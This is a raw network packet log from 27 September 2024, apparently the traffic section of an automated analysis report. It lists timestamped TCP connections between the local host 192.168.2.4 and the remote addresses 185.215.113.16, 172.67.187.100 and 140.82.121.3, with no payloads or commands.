                                                                                                                                                                Sep 27, 2024 17:42:35.619920969 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.620018959 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.620134115 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.620328903 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.625247002 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.898221016 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.898291111 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.903183937 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.903203964 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.903525114 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.904361010 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.947412968 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.023262024 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.023349047 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.037611961 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.037638903 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.037971973 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.047745943 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.091427088 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.313155890 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.313277960 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.313333988 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.320096970 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.320118904 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.320144892 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.320149899 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.327580929 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.327677965 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.345884085 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.350657940 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.448318005 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.448457003 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.448530912 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.484786034 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.484839916 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.484864950 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.484874964 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.586858988 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.586978912 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.692055941 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.692353010 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.697525978 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.697568893 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.697590113 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.697618961 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.697875023 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.702661037 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.769378901 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.769428968 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.769633055 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.769998074 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.770014048 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.263865948 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.263957977 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.270778894 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.270787001 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.271042109 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.271991968 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.319390059 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.483922005 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.483980894 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.484781981 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.489586115 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.565628052 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.565687895 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.937370062 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.112597942 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.112708092 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.114231110 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.114237070 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.114495039 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.127162933 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.164429903 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.164509058 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.167443037 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.295066118 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.295372963 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.302840948 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.302912951 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.302968025 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.303031921 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.306612015 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.312087059 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.370567083 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.370690107 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.370825052 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.379575968 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.379587889 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.379599094 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.379605055 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.936824083 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.936876059 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.936994076 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.937298059 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.937315941 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.047832966 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.047919989 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.069158077 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.074402094 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.312967062 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.313080072 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.440481901 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.440566063 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:43.454751015 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.457469940 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.459887028 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:43.459913015 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.460247993 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.461788893 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:43.469702959 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.469775915 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.471426964 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.471508980 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.503415108 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.517040014 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.522797108 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.734976053 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.735084057 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.735158920 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.109185934 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.109222889 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.109354019 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.109364033 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.228558064 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.228801012 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.248790979 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.253781080 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.483057022 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.485595942 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.635293961 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.635790110 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.640500069 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.640562057 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.640783072 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.640851021 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.644453049 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.649405003 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.947978973 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.948035002 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.948107004 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.948626041 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.948643923 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.341553926 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.341614008 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.360764980 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.365649939 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.407246113 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.407324076 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.409075022 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.409087896 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.409342051 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.411652088 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.455406904 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.584373951 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.584492922 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.703466892 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.703767061 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.708892107 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.708956003 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.709500074 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.709640980 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.709882975 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.715053082 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.806466103 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.806577921 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.808938980 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.836628914 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.836667061 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.836682081 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.836689949 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.427062988 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.427407980 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.474534988 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.479477882 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.704027891 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.704082966 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.817687035 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.818115950 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.822999001 CEST8049827185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.823065042 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.823219061 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.823262930 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.824382067 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.829421997 CEST8049827185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.871253967 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:46.871301889 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.871360064 CEST49828443192.168.2.4172.67.187.100
Sep 27, 2024 17:42:46.872107029 CEST  49828  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:46.872124910 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.359904051 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.359982014 CEST  49828  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:47.364626884 CEST  49828  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:47.364645958 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.365057945 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.365978003 CEST  49828  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:47.411396980 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.538531065 CEST  80     49827  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:47.538597107 CEST  49827  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:47.564946890 CEST  49827  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:47.571041107 CEST  80     49827  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:47.798877001 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.799012899 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.799077034 CEST  49828  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:47.804733992 CEST  80     49827  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:47.804805040 CEST  49827  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:47.823606968 CEST  49828  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:47.823637009 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.823651075 CEST  49828  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:47.823657036 CEST  443    49828  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:47.932101011 CEST  49827  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:47.932416916 CEST  49829  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:47.963970900 CEST  80     49827  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:47.965174913 CEST  80     49829  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:47.965240002 CEST  49827  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:47.965286970 CEST  49829  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:47.969048023 CEST  49829  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:47.992849112 CEST  80     49829  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:48.715414047 CEST  80     49829  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:48.715471983 CEST  49829  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:48.721458912 CEST  49829  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:48.723124981 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:48.723160982 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:48.723238945 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:48.729926109 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:48.729942083 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:48.734107018 CEST  80     49829  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:48.956645966 CEST  80     49829  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:48.956715107 CEST  49829  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:49.153541088 CEST  49829  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:49.153968096 CEST  49831  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:49.165313959 CEST  80     49831  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:49.165539026 CEST  49831  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:49.166328907 CEST  80     49829  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:49.169349909 CEST  49829  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:49.309902906 CEST  49831  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:49.314965963 CEST  80     49831  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:49.423377037 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.423427105 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:49.423523903 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.424094915 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.424120903 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:49.453998089 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:49.454062939 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:49.456552982 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:49.456564903 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:49.456939936 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:49.513376951 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:49.559407949 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:49.575086117 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.575191975 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:49.575279951 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.576093912 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.576131105 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:49.871306896 CEST  80     49831  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:49.871407986 CEST  49831  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:49.892885923 CEST  49831  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:49.898241997 CEST  80     49831  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:49.941942930 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:49.942015886 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.951535940 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.951558113 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:49.951839924 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:49.955956936 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:49.999420881 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.083151102 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.083242893 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.084501982 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.084527016 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.084891081 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.085870981 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.127413988 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.157110929 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:50.160288095 CEST  80     49831  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:50.160366058 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:50.160439014 CEST  443    49830  140.82.121.3     192.168.2.4
Sep 27, 2024 17:42:50.160466909 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:50.160485029 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:50.160469055 CEST  49831  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:50.163753033 CEST  49830  443    192.168.2.4      140.82.121.3
Sep 27, 2024 17:42:50.217494965 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.217601061 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.217657089 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.218080044 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.218080044 CEST  49832  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.218101025 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.218111038 CEST  443    49832  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.270520926 CEST  49831  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:50.271136999 CEST  49834  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:50.292521000 CEST  80     49834  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:50.292632103 CEST  49834  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:50.292896032 CEST  80     49831  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:50.292977095 CEST  49831  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:50.296418905 CEST  49834  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:50.301258087 CEST  80     49834  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:50.506676912 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.506798029 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.506860018 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.508985996 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.509035110 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:50.509067059 CEST  49833  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:50.509082079 CEST  443    49833  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:51.015335083 CEST  80     49834  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:51.015404940 CEST  49834  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:51.016426086 CEST  49834  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:51.023520947 CEST  80     49834  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:51.241101027 CEST  80     49834  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:51.241204023 CEST  49834  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:51.350713968 CEST  49834  80     192.168.2.4      185.215.113.16
